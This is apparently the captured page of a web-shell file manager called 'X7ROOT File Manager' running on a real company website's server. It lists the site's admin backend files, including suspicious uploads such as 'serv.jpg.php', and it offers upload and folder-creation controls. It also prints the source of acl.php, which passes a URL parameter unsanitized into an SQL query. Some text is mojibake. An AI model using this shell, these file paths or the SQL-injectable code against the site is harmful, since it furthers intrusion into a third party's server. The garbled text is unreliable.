X7ROOT File Manager
Current Path:
/var/www/vhosts/hwtw.com.tw/httpdocs/backend
var
/
www
/
vhosts
/
hwtw.com.tw
/
httpdocs
/
backend
/
ð
..
ð
.DS_Store
(14 KB)
ð
.htaccess
(1.33 KB)
ð
529.php
(2.07 KB)
ð
HanszxzV.html
(1.72 KB)
ð
acl.php
(501 B)
ð
acl_s.php
(3.8 KB)
ð
acl_u.php
(1.84 KB)
ð
acl_xml.php
(3.92 KB)
ð
admin.php
(5 B)
ð
admin_data.php
(6.48 KB)
ð
admin_i.php
(3.21 KB)
ð
admin_s.php
(15.22 KB)
ð
admin_u.php
(4.11 KB)
ð
alertifyjs
ð
assets
ð
auth_check.php
(6.2 KB)
ð
batchdelete.php
(236 B)
ð
bootstrap
ð
changesort.php
(238 B)
ð
changestatus.php
(255 B)
ð
ckeditor
ð
config
ð
css
ð
datetimepicker
ð
favicon.ico
(596 B)
ð
func
ð
getclass.php
(376 B)
ð
images
ð
index.php
(3 B)
ð
index_class.php
(5 B)
ð
index_class_data.php
(3 B)
ð
index_class_s.php
(7.09 KB)
ð
index_img.php
(3 B)
ð
index_img_data.php
(7.05 KB)
ð
index_img_i.php
(3.2 KB)
ð
index_img_s.php
(13.7 KB)
ð
index_img_u.php
(3.74 KB)
ð
js
ð
kcfinder
ð
list_category.php
(1.89 KB)
ð
login.php
(5.66 KB)
ð
logout.php
(104 B)
ð
menu.php
(2.44 KB)
ð
news.php
(1.04 KB)
ð
news_class.php
(1.27 KB)
ð
news_class_data.php
(7.65 KB)
ð
news_class_i.php
(3.21 KB)
ð
news_class_s.php
(15.99 KB)
ð
news_class_u.php
(3.75 KB)
ð
news_data.php
(18.27 KB)
ð
news_i.php
(3.21 KB)
ð
news_s.php
(16.24 KB)
ð
news_u.php
(3.74 KB)
ð
peli.php
(3.22 KB)
ð
product.php
(1.46 KB)
ð
product_class.php
(1.27 KB)
ð
product_class2.php
(1.07 KB)
ð
product_class2_data.php
(8.04 KB)
ð
product_class2_i.php
(3.21 KB)
ð
product_class2_s.php
(17.6 KB)
ð
product_class2_u.php
(3.75 KB)
ð
product_class_data.php
(9.07 KB)
ð
product_class_i.php
(4.01 KB)
ð
product_class_s.php
(9.69 KB)
ð
product_class_u.php
(3.75 KB)
ð
product_data.php
(8.13 KB)
ð
product_i.php
(3.17 KB)
ð
product_s.php
(15.11 KB)
ð
product_u.php
(3.72 KB)
ð
public_include.php
(372 B)
ð
serv.jpg.php
(11.91 KB)
ð
sortable.php
(1.56 KB)
ð
start.php
(383 B)
ð
start_data.php
(202 B)
ð
start_s.php
(14 KB)
ð
support.php
(1.29 KB)
ð
support_data.php
(3.88 KB)
ð
support_s.php
(8.17 KB)
ð
support_u.php
(3.7 KB)
ð
template.php
(11.03 KB)
ð
toastr
ð
top.php
(1.62 KB)
ð
web_setting.php
(1018 B)
ð
web_setting_data.php
(3.53 KB)
ð
web_setting_u.php
(3.75 KB)
Editing: acl.php
<?php require_once('public_include.php'); $id = $_GET['id']; if(isset($_GET['id'])){ $strSQL = "select * from member where id='$id'"; $rs=$db->Execute($strSQL); if($db->Affected_Rows()<1){ FuncSite::msg_box_error('æĨįĄæĪåļģčïž'); Func::go_to(-1); exit; } $admin_account = $id; } switch($_GET['func']){ case "update"; require_once('acl_u.php'); break; case "xml": require_once('acl_xml.php'); break; default: require_once('acl_s.php'); }
Upload File
Create Folder